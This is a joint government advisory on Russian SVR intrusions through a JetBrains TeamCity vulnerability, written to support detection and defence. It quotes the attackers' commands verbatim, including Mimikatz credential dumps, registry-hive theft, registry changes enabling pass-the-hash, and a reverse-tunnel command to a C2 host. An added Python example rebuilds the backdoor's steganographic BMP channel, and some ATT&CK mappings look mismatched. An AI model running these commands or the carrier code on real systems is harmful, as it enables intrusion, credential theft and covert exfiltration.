December 13, 2023
SUMMARY
The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.
Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, the limited number and seemingly opportunistic types of victims currently identified indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to the FBI and CISA.
Download the PDF version of this report: AA23-347A Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally (PDF, 774.65 KB)
For a downloadable copy of IOCs, see: AA23-347A STIX XML (XML, 76.99 KB) and AA23-347A STIX JSON (JSON, 69.29 KB)
THREAT OVERVIEW
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing is visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.
Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, the U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.
In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, exploitation of a zero-day vulnerability, and exploitation of Microsoft 365 cloud environments.
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a vulnerability in a software development tool, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to-detect command and control (C2) infrastructure.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While the SVR followed a similar playbook in each compromise, it also adjusted to each operating environment, and not all steps or actions presented below were executed on every host.
Initial Access - Exploitation
The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, an authentication bypass in TeamCity On-Premises (fixed in version 2023.05.4): insecure handling of specific request paths lets an unauthenticated attacker bypass authorization checks and achieve arbitrary code execution on the server. The authoring agencies’ observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges (the privileges of the TeamCity service account), granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity being exploited by the SVR.
Host Reconnaissance
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:"" /user:"" /password:"" process list brief
wmic /node:"" process list brief
wmic process get commandline -all
wmic process get commandline
wmic process where name="GoogleCrashHandler64.exe" get commandline,processed
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
File Exfiltration
Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] that provide insight into the host’s operating system and installed software:
C:\Windows\system32\ntoskrnl.exe, to precisely identify the kernel build, likely as a prerequisite to deploying EDRSandBlast (which relies on build-specific kernel offsets).
SQL Server executable files: based on the review of the post-exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems:
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll
Visual Studio files: based on the review of the post-exploitation actions, the SVR showed an interest in specific files of Visual Studio:
C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe
Update management agent files – based on the review of the post exploitation actions, the SVR showed an interest in executables and configuration of patch management software:
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd
C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf
Interest in SQL Server
Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:
powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip
SVR cyber actors also exfiltrated secforwarder.dll.
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].
This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection from AV/EDR processes. PPL prevents even administrator-level code from opening or tampering with a protected process; once it is stripped, the actors inject code into the AV/EDR processes, which was observed for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (e.g., Mimikatz) were executed in memory [T1003.001].
In several cases the SVR attempted to hide its backdoors by:
Abusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with one containing the GraphicalProton backdoor,
Backdooring vcperf, an open source application developed by Microsoft. The SVR modified and compiled the publicly available source code; after execution, the backdoored vcperf dropped several DLLs to disk, one of them a GraphicalProton backdoor,
Abusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with one containing the GraphicalProton backdoor.
To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with the malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564].
Privilege Escalation
To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.
The SVR modified the NoLMHash value using the following reg command. Setting NoLMHash to 0 makes Windows store the weak LM hash alongside the NT hash the next time a password is changed, which makes subsequent credential dumps easier to crack:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f
The SVR used the following Mimikatz commands [T1003]:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Persistence
The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, its executables were stored in one of the following directories:
C:\Windows\temp
C:\Windows\System32
C:\Windows\WinStore
The SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed to schtasks.exe, which can be found in Appendix B – Indicators of Compromise.
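As an added example (not from the advisory), the following Python shows how to triage Windows Security event 4698 (scheduled task created) against this section’s indicators: it parses the escaped task XML carried in the TaskContent field to recover the Exec action, then flags task names from the advisory’s detection rules (a subset is transcribed), actions launched from the C:\Windows\temp and C:\Windows\WinStore staging directories named above, and actions that reference the GraphicalProton DLL names given in the detection rules. The sample events, the user name, the “UpdateCheck” task and the upd.exe binary are constructed for the example.

```python
"""Triage of Windows Security 4698 (scheduled task created) events against this advisory's indicators.
Added example; the task names and DLL names are transcribed from the advisory, everything else is constructed."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Subset of the task names the advisory attributes to the SVR, lowercased for comparison.
KNOWN_TASK_NAMES = {n.lower() for n in (
    r"\Microsoft\Windows\IISUpdateService",
    r"\Microsoft\Windows\WindowsDefenderService",
    r"\Microsoft\Windows\Application Experience\StartupAppTaskCkeck",  # actor's misspelling of the real task
    r"\WindowUpdate",
    r"\Defender",
)}
# Subset of the GraphicalProton DLL names listed in the advisory's image_load rule, lowercased.
KNOWN_DLLS = {"aclnumsinverthost.dll", "modebitmapnumericanimate.dll", "unregisterancestorappendauto.dll"}
# Directories the advisory names as backdoor staging locations; System32 is left out because it is noisy alone.
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\windows\\winstore\\")


def parse_4698(event_xml: str) -> dict:
    """Pull TaskName, creating user and the Exec action out of a 4698 event; TaskContent is escaped task XML."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{{{EVT_NS}}}Data")}
    task = ET.fromstring(data.get("TaskContent", "<Task/>"))
    exec_el = task.find(f".//{{{TASK_NS}}}Exec")
    command = exec_el.findtext(f"{{{TASK_NS}}}Command", default="") if exec_el is not None else ""
    arguments = exec_el.findtext(f"{{{TASK_NS}}}Arguments", default="") if exec_el is not None else ""
    return {"task_name": data.get("TaskName", ""), "user": data.get("SubjectUserName", ""),
            "command": command.strip().strip('"'), "arguments": arguments.strip()}


def triage(event_xml: str) -> list:
    """Return the reasons an event deserves a look; an empty list means none of the indicators matched."""
    rec = parse_4698(event_xml)
    reasons = []
    if rec["task_name"].lower() in KNOWN_TASK_NAMES:
        reasons.append("known SVR task name")
    if rec["command"].lower().startswith(STAGING_DIRS):
        reasons.append("action runs from a staging directory")
    action = f"{rec['command']} {rec['arguments']}".lower()
    if any(dll in action for dll in KNOWN_DLLS):
        reasons.append("known GraphicalProton DLL name")
    return reasons


def build_4698(task_name: str, command: str, arguments: str, user: str = "Administrator") -> str:
    """Construct a minimal 4698 event the way the Security log renders it (TaskContent escaped inline)."""
    task_xml = (f'<Task version="1.2" xmlns="{TASK_NS}"><Actions Context="Author"><Exec>'
                f"<Command>{escape(command)}</Command><Arguments>{escape(arguments)}</Arguments>"
                "</Exec></Actions></Task>")
    return (f'<Event xmlns="{EVT_NS}"><System><EventID>4698</EventID></System><EventData>'
            f'<Data Name="SubjectUserName">{escape(user)}</Data>'
            f'<Data Name="TaskName">{escape(task_name)}</Data>'
            f'<Data Name="TaskContent">{escape(task_xml)}</Data></EventData></Event>')


# Constructed samples: the first two model the advisory's observations, the third is a stock Windows task.
SAMPLES = [
    build_4698(r"\Microsoft\Windows\WindowsDefenderService", r"C:\Windows\System32\rundll32.exe",
               r"C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"),
    build_4698(r"\Microsoft\Windows\Maintenance\UpdateCheck", r"C:\Windows\temp\upd.exe", ""),  # hypothetical
    build_4698(r"\Microsoft\Windows\Defrag\ScheduledDefrag", r"%windir%\system32\defrag.exe", "-c -h -k -g -$"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(parse_4698(sample)["task_name"], "->", triage(sample) or "clean")
```

System32 is deliberately not treated as a staging indicator on its own, since most legitimate Microsoft tasks run from there; the first sample is caught through its task name and the DLL it loads instead. For a live hunt, feed the XML of every 4698 (and 4702, task updated) event from the Security log through `triage`, and compare any surviving task against the schtasks argument variants in Appendix B.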
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].
Sensitive Data Exfiltration [T1020]
The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
In order to exfiltrate the Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. It used “reg save” to save the SYSTEM, SAM and SECURITY registry hives, and used PowerShell to stage .zip archives in the C:\Windows\Temp\ directory.
reg save HKLM\SYSTEM "C:\Windows\temp\1\sy.sa" /y
reg save HKLM\SAM "C:\Windows\temp\1\sam.sa" /y
reg save HKLM\SECURITY "C:\Windows\temp\1\se.sa" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
The SVR also used the open source DSInternals tool to interact with Active Directory Domain Services. DSInternals allows an actor with sufficient privileges to obtain sensitive domain information, including account password hashes.
Network Reconnaissance
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit (its PowerView module), which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named “rr.exe”—a modified open source reverse SOCKS tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].
The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Lateral Movement
The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
wmic /node:"" /user:"" /password:"" process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
The SVR also modified the DisableRestrictedAdmin value to enable remote connections [T1210]. Setting it to 0 turns on Restricted Admin mode for RDP, which allows an RDP logon with an NTLM hash or Kerberos ticket instead of a cleartext password (pass-the-hash over RDP).
It modified Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
Adversary Toolset
In the course of the TeamCity operation, the SVR used multiple custom and publicly available open source tools and backdoors. The following custom tools were observed in use during the operation:
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.
After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1057], as well as user, host, and domain names [T1590]. OneDrive is used as the primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files, carrying both commands and results [T1564.001]. The directory name is re-randomized each time the GraphicalProton process is started.
BMP files that were used to exchange data were generated in the following way:
Compress data using zlib,
Encrypt data using custom algorithm,
Add “***” string literal to encrypted data,
Create a random BMP with random rectangle,
And finally, encode encrypted data within lower pixel bits.
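As an added illustration (not GraphicalProton’s code and not from the advisory), the following Python reconstructs the five-step carrier pipeline described above and its reverse. The undisclosed custom cipher is replaced by a labelled repeating-key XOR stand-in, the key, image size, seed and payload are constructed, and the BMP is written without external libraries so the script runs offline. The `has_marker` heuristic shows the hunting angle the pipeline exposes: because the `***` literal is appended after encryption, it sits in the clear in the least-significant-bit plane of every carrier.

```python
"""Illustrative reconstruction of the GraphicalProton BMP carrier pipeline (added example, not SVR code)."""
import random
import struct
import zlib
from typing import Optional

MARKER = b"***"          # literal the advisory says is appended to the encrypted data
KEY = b"example-key"     # assumption: the real "custom algorithm" and its key are undisclosed


def toy_cipher(data: bytes, key: bytes = KEY) -> bytes:
    """Stand-in for the undisclosed custom cipher: repeating-key XOR, which is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def blank_carrier(seed: int = 7, width: int = 64, height: int = 32) -> bytearray:
    """Step 4: a 24-bit BMP showing a random rectangle on a random background (width % 4 == 0 avoids row padding)."""
    assert width % 4 == 0
    rng = random.Random(seed)
    pixels = bytearray(width * height * 3)
    bg = bytes(rng.randrange(256) for _ in range(3))
    fg = bytes(rng.randrange(256) for _ in range(3))
    x0, y0 = rng.randrange(width), rng.randrange(height)
    x1, y1 = rng.randrange(x0, width), rng.randrange(y0, height)
    for y in range(height):
        for x in range(width):
            off = (y * width + x) * 3
            pixels[off:off + 3] = fg if x0 <= x <= x1 and y0 <= y <= y1 else bg
    header = b"BM" + struct.pack("<IHHI", 54 + len(pixels), 0, 0, 54)           # BITMAPFILEHEADER
    header += struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)  # BITMAPINFOHEADER
    return bytearray(header) + pixels


def embed(payload: bytes, bmp: bytearray) -> bytearray:
    """Steps 1-3 and 5: zlib -> cipher -> append '***' -> write each bit into the LSB of consecutive pixel bytes."""
    offset = struct.unpack_from("<I", bmp, 10)[0]
    blob = toy_cipher(zlib.compress(payload)) + MARKER
    bits = "".join(f"{b:08b}" for b in blob)
    if len(bits) > len(bmp) - offset:
        raise ValueError("payload exceeds carrier capacity")
    for i, bit in enumerate(bits):
        bmp[offset + i] = (bmp[offset + i] & 0xFE) | int(bit)
    return bmp


def lsb_plane(bmp: bytes) -> bytes:
    """Reassemble bytes (MSB first) from the lowest bit of each pixel byte after the header's pixel offset."""
    offset = struct.unpack_from("<I", bmp, 10)[0]
    body, out = bmp[offset:], bytearray()
    for i in range(0, len(body) - 7, 8):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (body[i + j] & 1)
        out.append(byte)
    return bytes(out)


def has_marker(bmp: bytes) -> bool:
    """Hunting heuristic: the terminator is added after encryption, so it is visible in the clear in the LSB plane."""
    return MARKER in lsb_plane(bmp)


def recover(bmp: bytes) -> Optional[bytes]:
    """Reverse the pipeline; every '***' position is tried because the literal can also occur inside ciphertext."""
    plane, start = lsb_plane(bmp), 0
    while (idx := plane.find(MARKER, start)) != -1:
        try:
            return zlib.decompress(toy_cipher(plane[:idx]))   # the adler32 check rejects wrong split points
        except zlib.error:
            start = idx + 1
    return None


def build_carrier(payload: bytes, seed: int = 7) -> bytearray:
    """Produce one task-result carrier the way the operator side would."""
    return embed(payload, blank_carrier(seed))


if __name__ == "__main__":
    carrier = build_carrier(b"whoami /priv\r\nnltest /dclist:corp.example\r\n")   # constructed task output
    print(len(carrier), "bytes;", "marker present:", has_marker(carrier), "; recovered:", recover(carrier))
```

Three consecutive 0x2A bytes also occur by chance in the LSB noise of natural images (roughly one chance in 2^24 per byte position), so `has_marker` is a triage filter for BMP files pulled from the observed OneDrive and Dropbox channel, not a stand-alone alert; the decryption and zlib step is what confirms a hit.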
While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.
GraphicalProton HTTPS variant: a variant of the GraphicalProton backdoor recently introduced by the SVR that forgoes cloud-based services as a C2 channel and instead relies on HTTPS requests to actor-controlled infrastructure.
To legitimize the C2 channel, the SVR used a re-registered expired domain hosting a dummy WordPress website. Execution of the HTTPS variant of GraphicalProton is split into two files: a stager and an encrypted binary file that contains the further code.
MITRE ATT&CK TACTICS AND TECHNIQUES
See the tables below for all threat actor tactics and techniques referenced in this advisory. For additional mitigations, see the Mitigations section.
Table 1: SVR Cyber Actors ATT&CK Techniques for Enterprise - Reconnaissance
Technique Title | ID | Use
Gather Victim Network Information: Network Topology | T1590.004 | SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.
Gather Victim Host Information: Software | T1592.002 | SVR cyber actors may gather information about the software installed on the victim’s hosts that can be used during targeting.
Table 2: SVR Cyber Actors’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | SVR cyber actors exploit internet-connected JetBrains TeamCity servers using CVE-2023-42793 for initial access.
Table 3: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Execution
Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | SVR cyber actors used PowerShell commands to compress Microsoft SQL Server .dll files.
Command and Scripting Interpreter: Windows Command Shell | T1059.003 | SVR cyber actors ran built-in utilities (whoami, nltest, tasklist, netstat, wmic) from the command shell and launched PowerShell one-liners from it to perform host reconnaissance, for example: powershell ([adsisearcher]"((samaccountname=))").Findall().Properties; powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof; powershell Get-WmiObject -Class Win32_Service -Computername; powershell Get-WindowsDriver -Online -All
Exploitation for Client Execution | T1203 | SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.
Hijack Execution Flow: DLL Side-Loading | T1574.002 | SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.
Table 4: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Persistence
Technique Title | ID | Use
Scheduled Task | T1053.005 | SVR cyber actors abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code.
Server Software Component: SQL Stored Procedures | T1505.001 | SVR cyber actors abuse SQL Server stored procedures to maintain persistence.
Boot or Logon Autostart Execution | T1547 | SVR cyber actors collected C:\Windows\system32\ntoskrnl.exe to identify the exact kernel build, a prerequisite for deploying EDRSandBlast (see File Exfiltration).
Table 5: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Privilege Escalation
Technique Title | ID | Use
Exploitation for Privilege Escalation | T1068 | SVR cyber actors exploit the JetBrains TeamCity vulnerability to achieve escalated privileges. To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms.
Account Manipulation | T1098 | SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.
Table 6: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Defense Evasion
Technique Title | ID | Use
Obfuscated Files or Information: Binary Padding | T1027.001 | SVR cyber actors use randomly generated BMP files as padded carriers for the data exchanged with their C2 infrastructure.
Masquerading | T1036 | SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.
Process Injection | T1055 | SVR cyber actors inject code into AV and EDR processes to evade defenses.
Disable or Modify Tools | T1562.001 | SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.
Hide Artifacts | T1564 | SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.
Hide Artifacts: Hidden Files and Directories | T1564.001 | When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files carrying both commands and results.
Table 7: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Credential Access
Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.
OS Credential Dumping: Security Account Manager | T1003.002 | SVR cyber actors used the Mimikatz commands privilege::debug, lsadump::cache, lsadump::secrets, lsadump::sam and sekurlsa::logonpasswords to gain access to credentials. Additionally, SVR cyber actors exfiltrated the HKLM\SYSTEM, HKLM\SAM and HKLM\SECURITY registry hives to steal credentials.
Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).
Table 8: SVR Cyber Actors ATT&CK Techniques for Enterprise: Discovery
Technique Title | ID | Use
System Owner/User Discovery | T1033 | SVR cyber actors use the built-in commands whoami /priv, whoami /all, whoami /groups and whoami /domain to perform user discovery during host reconnaissance.
Network Service Discovery | T1046 | SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit.
Process Discovery | T1057 | SVR cyber actors use GraphicalProton to gather running process data.
Gather Victim Network Information | T1590 | SVR cyber actors use GraphicalProton to gather victim network information.
Table 9: SVR Cyber Actors ATT&CK Techniques for Enterprise: Lateral Movement
Technique Title | ID | Use
Exploitation of Remote Services | T1210 | SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.
Windows Management Instrumentation | T1047 | SVR cyber actors executed Rsockstun either in memory or via Windows Management Instrumentation (WMI) to execute malicious commands and payloads, for example: wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Table 10: SVR Cyber Actors ATT&CK Techniques for Enterprise: Command and Control
Technique Title | ID | Use
Dynamic Resolution | T1568 | The SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.
Protocol Tunneling | T1572 | SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. In selected environments, the SVR used an additional tool named “rr.exe”—a modified open source reverse SOCKS tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure.
Table 11: SVR Cyber Actors ATT&CK Techniques for Enterprise: Exfiltration
Technique Title | ID | Use
Automated Exfiltration | T1020 | SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after it is gathered during collection.
Exfiltration Over C2 Channel | T1041 | SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.
Exfiltration Over Web Service | T1567 | SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 infrastructure.
INDICATORS OF COMPROMISE
Note: Please refer to Appendix B for a list of IOCs.
VICTIM TYPES
As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.
DETECTION METHODS
The following rules can be used to detect activity linked to this adversary. They should be treated as examples and adapted to each organization’s environment and telemetry.
SIGMA Rules
title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author:
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
